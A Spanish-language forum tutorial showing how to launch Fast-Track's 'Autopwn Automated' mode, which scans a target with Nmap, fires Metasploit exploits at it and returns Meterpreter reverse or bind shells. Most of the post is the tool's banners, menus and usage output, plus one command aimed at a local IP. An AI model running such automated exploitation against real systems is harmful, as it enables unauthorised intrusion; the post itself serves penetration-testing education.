[Fast-Track + Metasploit] Autopwn Automation
[Metasploit] By: Shell Root
[Metasploit] By: Shell Root
Fast-Track es un proyecto basado en Python de código abierto destinado a ayudar a los Pent-Test en un esfuerzo por identificar, explotar y además penetrar en una red.
Fast-Track utiliza una gran parte de la Metasploit Framework para terminar los ataques con éxito. Fast Track tiene una amplia variedad de ataques únicos que le permiten utilizar el marco de Metasploit a su máximo potencial.
Como alguna vez miramos en estos 2 Articulos.
- http://foro.elhacker.net/hacking_basico/metasploit_nessus_pasar_resultado_de_escaneo_de_nessus_al_msf-t279697.0.html
- http://foro.elhacker.net/hacking_basico/nmap_metasploit_pasar_resultado_de_escaneo_de_nmap_al_msf-t279852.0.html
Al momento de escanear y obtener resultados contundentes con el Scanner Nessus And/Or Nmap, podremos hacer uso del Comando Autopwn, ahora que es lo que hace Autopwn Automation? Esto lo que hace es automatizar todos los pasos anteriores con tan solo poner la IP. Parece un poco
Ejecutamos el Script Fast-Track.py y damos como parametros el modo para interactuar. Recordad:
- -c (Command Line Mode)
- -g (Web GUI Mode)
Código:
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py
[sudo] password for shellroot:
Psyco not detected....Recommend installing it for increased speeds.
----------------------------------------------------------------
Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...
Automated Penetration Testing
Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com
Wiki and Bug Track: http://www.thepentest.com
Please read the README and LICENSE before using
this tool for acceptable use and modifications.
----------------------------------------------------------------
Modes:
Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g
Examples: ./fast-track.py -i
./fast-track.py -c
./fast-track.py -g
./fast-track.py -g <portnum>
Usage: ./fast-track.py <mode>
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c
Psyco not detected....Recommend installing it for increased speeds.
----------------------------------------------------------------
Fast-Track v4.0 - Where it's OK to finish in under 3 minutes...
Automated Penetration Testing
Written by David Kennedy (ReL1K)
SecureState
http://www.securestate.com
dkennedy@securestate.com
Wiki and Bug Track: http://www.thepentest.com
Please read the README and LICENSE before using
this tool for acceptable use and modifications.
----------------------------------------------------------------
Modes:
Interactive Menu Driven Mode: -i
Command Line Mode: -c
Web GUI Mode -g
Examples: ./fast-track.py -i
./fast-track.py -c
./fast-track.py -g
./fast-track.py -g <portnum>
Usage: ./fast-track.py <mode>
************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************
**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST (setup.py) ****
Visit http://trac.thepentest.com for tutorials or to file a bug.
1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About
Usage: fast-track.py -c <tool#>
shellroot@shellroot-desktop:~/fasttrack$
Seleccionamos el item Autopwn Automation
Código:
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2
Metasploit Autopwn Automated
Metasploit's Autopwn Function can require some knowledge in order
to set it up. Fast-Track tries to simplify that.
Simply type ./fast-track -c 2 <ipaddr or range> <-r or -b> (reverse or bind) to launch the exploits.
Usage: ./fast-track.py -c 2 <iprange> <-r or -b> <--reverse or bind
Examples: ./fast-track.py -c 2 192.168.1.1-254 -b
./fast-track.py -c 2 "-PN 192.168.1.1-254" -r
./fast-track.py -c 2 "-T 1 192.168.1.1/24" -r
shellroot@shellroot-desktop:~/fasttrack$
Miramos y Asignamos parametros son necesarios para correr el Exploit Automatizado.
Código:
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 2 192.168.0.2 -r
Se creará una "Base de Datos", de nombre Pentest, y se ejecutará el Nmap con el Parametro IP o Rango Asignado. Ahora hará uso del comando Autopwn y esperametros a que termine de verificar los Exploit que pueden ser ejecutados por las vulnerabilidades encontradas en el sistema. Por ultimo esperaremos que nos entregue las sessiones el Meterpreter.
By: Shell Root